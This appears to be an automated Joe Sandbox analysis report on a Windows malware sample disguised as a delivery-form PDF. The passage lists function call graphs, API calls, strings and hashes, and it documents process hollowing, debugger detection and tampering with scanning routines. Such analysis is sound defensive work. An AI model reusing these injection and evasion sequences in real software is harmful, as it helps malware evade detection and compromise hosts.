call 2934798 call 293494c call 29346a4 call 2948824 call 29487a0 * 3 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 7298->7350 7337->7194 7349->7350 7575 294a460-294a6f2 call 29487a0 * 2 call 293480c call 293494c call 2934798 call 293494c call 29487a0 call 293480c call 293494c call 2934798 call 293494c call 29487a0 * 5 call 293480c call 293494c call 2934798 call 293494c call 29487a0 call 293480c call 293494c call 2934798 call 293494c call 29487a0 call 293480c call 293494c call 2934798 call 293494c call 29487a0 call 293480c call 293494c call 2934798 call 293494c call 29487a0 call 2947ed4 call 29487a0 * 2 7350->7575 7575->6830
                                                                                          APIs
                                                                                            • Part of subcall function 02948824: LoadLibraryA.KERNEL32(00000000,00000000,0294890B), ref: 02948858
                                                                                            • Part of subcall function 02948824: FreeLibrary.KERNEL32(74AE0000,00000000,02991388,Function_000065D8,00000004,02991398,02991388,05F5E0FF,00000040,0299139C,74AE0000,00000000,00000000,00000000,00000000,0294890B), ref: 029488EB
                                                                                            • Part of subcall function 029485DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02948668
                                                                                          • GetThreadContext.KERNEL32(000005A0,02991420,ScanString,029913A4,0294A77C,UacInitialize,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,UacInitialize,029913A4), ref: 02949442
                                                                                            • Part of subcall function 02948254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029482C5
                                                                                            • Part of subcall function 029484C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02948529
                                                                                            • Part of subcall function 029479B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02947A27
                                                                                            • Part of subcall function 02947D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02947D74
                                                                                          • SetThreadContext.KERNEL32(000005A0,02991420,ScanBuffer,029913A4,0294A77C,ScanString,029913A4,0294A77C,Initialize,029913A4,0294A77C,0000088C,003E9FF8,029914F8,00000004,029914FC), ref: 0294A157
                                                                                          • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000005A0,00000000,000005A0,02991420,ScanBuffer,029913A4,0294A77C,ScanString,029913A4,0294A77C,Initialize,029913A4,0294A77C,0000088C,003E9FF8,029914F8), ref: 0294A164
                                                                                            • Part of subcall function 029487A0: LoadLibraryW.KERNEL32(bcrypt,?,000005A0,00000000,029913A4,0294A3C7,ScanString,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,Initialize,029913A4,0294A77C,UacScan), ref: 029487B4
                                                                                            • Part of subcall function 029487A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029487CE
                                                                                            • Part of subcall function 029487A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005A0,00000000,029913A4,0294A3C7,ScanString,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,Initialize), ref: 0294880A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$MemoryThreadVirtual$ContextFreeLoad$AddressAllocateCreateProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                          • API String ID: 1022112746-51457883
                                                                                          • Opcode ID: 57b31183b2fa3ca47289ea445b260ecbd40b0b74f30c17078d091db7a3cd1acc
                                                                                          • Instruction ID: 34a0587d7af21cad4efde9af0ec7957f115a1d298cae1f28246d1fc78bdc184a
                                                                                          • Opcode Fuzzy Hash: 57b31183b2fa3ca47289ea445b260ecbd40b0b74f30c17078d091db7a3cd1acc
                                                                                          • Instruction Fuzzy Hash: 9CE20A75A501199BDB22FBA4CCA0EDE77FABFC9310F1251A1E009AB354DE30AE458F51
                                                                                          Function 02948BAE Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 7653 2948bae-2948bb3 7655 2948bb8-2948bbd 7653->7655 7655->7655 7656 2948bbf-2948ca6 call 293493c call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 7655->7656 7687 294a6f7-294a761 call 29344d0 * 2 call 2934c0c call 29344d0 call 29344ac call 29344d0 * 2 7656->7687 7688 2948cac-2948d87 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 7656->7688 7688->7687 7732 2948d8d-29490b5 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29330d4 * 2 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2934d8c call 2934d9c call 29485dc 7688->7732 7841 29490b7-2949123 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 7732->7841 7842 2949128-2949449 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29346a4 * 2 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2932ee0 call 2932f08 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 GetThreadContext 7732->7842 7841->7842 7842->7687 7950 294944f-29496b2 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2948254 7842->7950 8023 29499bf-2949a2b call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 7950->8023 8024 29496b8-2949821 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29484c4 7950->8024 8051 2949a30-2949bb0 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29479b4 8023->8051 8114 2949823-2949849 call 29479b4 8024->8114 8115 294984b-29498b7 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 8024->8115 8051->7687 8155 2949bb6-2949caf call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2948ac0 8051->8155 8123 29498bc-29499bd call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29479b4 8114->8123 8115->8123 8123->8051 8206 2949cb1-2949cfe call 29489b8 call 29489ac 8155->8206 8207 2949d03-294a6f2 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2947d00 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2947d00 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 SetThreadContext NtResumeThread call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2932c2c call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29487a0 * 3 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29487a0 * 2 call 293480c call 293494c call 2934798 call 293494c call 29487a0 call 293480c call 293494c call 2934798 call 293494c call 29487a0 * 5 call 293480c call 293494c call 2934798 call 293494c call 29487a0 call 293480c call 293494c call 2934798 call 293494c call 29487a0 call 293480c call 293494c call 2934798 call 293494c call 29487a0 call 293480c call 293494c call 2934798 call 293494c call 29487a0 call 2947ed4 call 29487a0 * 2 8155->8207 8206->8207 8207->7687
                                                                                          APIs
                                                                                            • Part of subcall function 02948824: LoadLibraryA.KERNEL32(00000000,00000000,0294890B), ref: 02948858
                                                                                            • Part of subcall function 02948824: FreeLibrary.KERNEL32(74AE0000,00000000,02991388,Function_000065D8,00000004,02991398,02991388,05F5E0FF,00000040,0299139C,74AE0000,00000000,00000000,00000000,00000000,0294890B), ref: 029488EB
                                                                                            • Part of subcall function 029485DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02948668
                                                                                          • GetThreadContext.KERNEL32(000005A0,02991420,ScanString,029913A4,0294A77C,UacInitialize,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,UacInitialize,029913A4), ref: 02949442
                                                                                            • Part of subcall function 02948254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029482C5
                                                                                            • Part of subcall function 029484C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02948529
                                                                                            • Part of subcall function 029479B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02947A27
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryMemoryVirtual$AllocateContextCreateFreeLoadProcessReadSectionThreadUnmapUserView
                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                          • API String ID: 4113022151-51457883
                                                                                          • Opcode ID: 923a42a1b81a6c922ae559ca9bee369c6614aa3d46591d7a5252ff2aef2af35f
                                                                                          • Instruction ID: 8290e8030a493ae4962bd96dbe9b3c26a4c4a3306177a9d5a109b0d61da9e323
                                                                                          • Opcode Fuzzy Hash: 923a42a1b81a6c922ae559ca9bee369c6614aa3d46591d7a5252ff2aef2af35f
                                                                                          • Instruction Fuzzy Hash: 8DE20975A501199BDB22FBA4DCA0EDE73FABFC9310F1251A1E009AB354DE30AE458F51
                                                                                          Function 02935A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 8510 2935a78-2935ab9 GetModuleFileNameA RegOpenKeyExA 8511 2935afb-2935b3e call 29358b4 RegQueryValueExA 8510->8511 8512 2935abb-2935ad7 RegOpenKeyExA 8510->8512 8517 2935b62-2935b7c RegCloseKey 8511->8517 8518 2935b40-2935b5c RegQueryValueExA 8511->8518 8512->8511 8513 2935ad9-2935af5 RegOpenKeyExA 8512->8513 8513->8511 8516 2935b84-2935bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 8513->8516 8519 2935bbb-2935bbf 8516->8519 8520 2935c9e-2935ca5 8516->8520 8518->8517 8521 2935b5e 8518->8521 8523 2935bc1-2935bc5 8519->8523 8524 2935bcb-2935be1 lstrlenA 8519->8524 8521->8517 8523->8520 8523->8524 8525 2935be4-2935be7 8524->8525 8526 2935bf3-2935bfb 8525->8526 8527 2935be9-2935bf1 8525->8527 8526->8520 8529 2935c01-2935c06 8526->8529 8527->8526 8528 2935be3 8527->8528 8528->8525 8530 2935c30-2935c32 8529->8530 8531 2935c08-2935c2e lstrcpynA LoadLibraryExA 8529->8531 8530->8520 8532 2935c34-2935c38 8530->8532 8531->8530 8532->8520 8533 2935c3a-2935c6a lstrcpynA LoadLibraryExA 8532->8533 8533->8520 8534 2935c6c-2935c9c lstrcpynA LoadLibraryExA 8533->8534 8534->8520
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02930000,0295D790), ref: 02935A94
                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02930000,0295D790), ref: 02935AB2
                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02930000,0295D790), ref: 02935AD0
                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02935AEE
                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02935B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02935B37
                                                                                          • RegQueryValueExA.ADVAPI32(?,02935CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02935B7D,?,80000001), ref: 02935B55
                                                                                          • RegCloseKey.ADVAPI32(?,02935B84,00000000,?,?,00000000,02935B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02935B77
                                                                                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02935B94
                                                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02935BA1
                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02935BA7
                                                                                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02935BD2
                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02935C19
                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02935C29
                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02935C51
                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02935C61
                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02935C87
                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02935C97
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                          • API String ID: 1759228003-2375825460
                                                                                          • Opcode ID: dfddfb0743204c0e9a581eaed4191ba18828b5329c4d0ebd1f0647223fb889e7
                                                                                          • Instruction ID: 498be6e93397c0fa0d6913514c52d0909adc4e4d6f1cfd776176f0bb4df0c8a9
                                                                                          • Opcode Fuzzy Hash: dfddfb0743204c0e9a581eaed4191ba18828b5329c4d0ebd1f0647223fb889e7
                                                                                          • Instruction Fuzzy Hash: 32519771A4024C7EFB26D6E4CC46FEF77BDAB4C744F8101A5AA04E61C1D7749A448F60
                                                                                          Function 029487A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 10523 29487a0-29487c5 LoadLibraryW 10524 29487c7-29487df GetProcAddress 10523->10524 10525 294880f-2948815 10523->10525 10526 2948804-294880a FreeLibrary 10524->10526 10527 29487e1-2948800 call 2947d00 10524->10527 10526->10525 10527->10526 10530 2948802 10527->10530 10530->10526
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(bcrypt,?,000005A0,00000000,029913A4,0294A3C7,ScanString,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,Initialize,029913A4,0294A77C,UacScan), ref: 029487B4
                                                                                          • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029487CE
                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005A0,00000000,029913A4,0294A3C7,ScanString,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,Initialize), ref: 0294880A
                                                                                            • Part of subcall function 02947D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02947D74
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                          • String ID: BCryptVerifySignature$bcrypt
                                                                                          • API String ID: 1002360270-4067648912
                                                                                          • Opcode ID: eda7f3d62016ae7cf1eb094430a9c93f3dfed677ca27b323fc4e5dbfc1c7d5fa
                                                                                          • Instruction ID: ff426b66d5f2e177c514203d47f31597dad1fc33b5970e133187be832897bff5
                                                                                          • Opcode Fuzzy Hash: eda7f3d62016ae7cf1eb094430a9c93f3dfed677ca27b323fc4e5dbfc1c7d5fa
                                                                                          • Instruction Fuzzy Hash: 8CF04F71A89215FEEB119A6CAC46FB673BCB78537EF00096AF11C87680CB7058508B50
                                                                                          Function 0294EBF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 10540 294ebf0-294ec0a GetModuleHandleW 10541 294ec36-294ec3e 10540->10541 10542 294ec0c-294ec1e GetProcAddress 10540->10542 10542->10541 10543 294ec20-294ec30 CheckRemoteDebuggerPresent 10542->10543 10543->10541 10544 294ec32 10543->10544 10544->10541
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(KernelBase), ref: 0294EC00
                                                                                          • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0294EC12
                                                                                          • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0294EC29
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                          • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                          • API String ID: 35162468-539270669
                                                                                          • Opcode ID: b3f6ac52b76b7a7b90d34994e8193435984689d4f9adea0c82ffbaef8211bf26
                                                                                          • Instruction ID: 2db90a199f57092b6efd5d0def7d853f71936732e7f35f6e6d615a400bc66bad
                                                                                          • Opcode Fuzzy Hash: b3f6ac52b76b7a7b90d34994e8193435984689d4f9adea0c82ffbaef8211bf26
                                                                                          • Instruction Fuzzy Hash: 42F0207090024CBBEB23A7A8888ABDCFBAD6B0132AF640794E0A0620C1EB7007808751
                                                                                          Function 0294DBB0 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 02934ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02934EDA
                                                                                          • RtlDosPa.N(00000000,?,00000000,00000000,00000000,0294DC80), ref: 0294DBEB
                                                                                          • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0294DC80), ref: 0294DC1B
                                                                                          • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0294DC30
                                                                                          • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0294DC5C
                                                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0294DC65
                                                                                            • Part of subcall function 02934C0C: SysFreeString.OLEAUT32(0294E950), ref: 02934C1A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$String$AllocCloseFreeInformationOpenQueryRead
                                                                                          • String ID:
                                                                                          • API String ID: 2659941336-0
                                                                                          • Opcode ID: c6b6689a288fb729bf9f3131f1e4225d85f0665ebe03e1d908650c2d3c31a44f
                                                                                          • Instruction ID: 8a979ae9b20b1f6f35c47e22c2bdb71b8eb25449a1e51951af0a73659ded49ce
                                                                                          • Opcode Fuzzy Hash: c6b6689a288fb729bf9f3131f1e4225d85f0665ebe03e1d908650c2d3c31a44f
                                                                                          • Instruction Fuzzy Hash: B521D375A50708BAEB11EAE4CC46FDEB7BDAF88B00F510561F600F71C0DAB4AA058B65
                                                                                          Function 0294E2F8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0294E436
                                                                                          Strings
                                                                                          Memory Dump Source
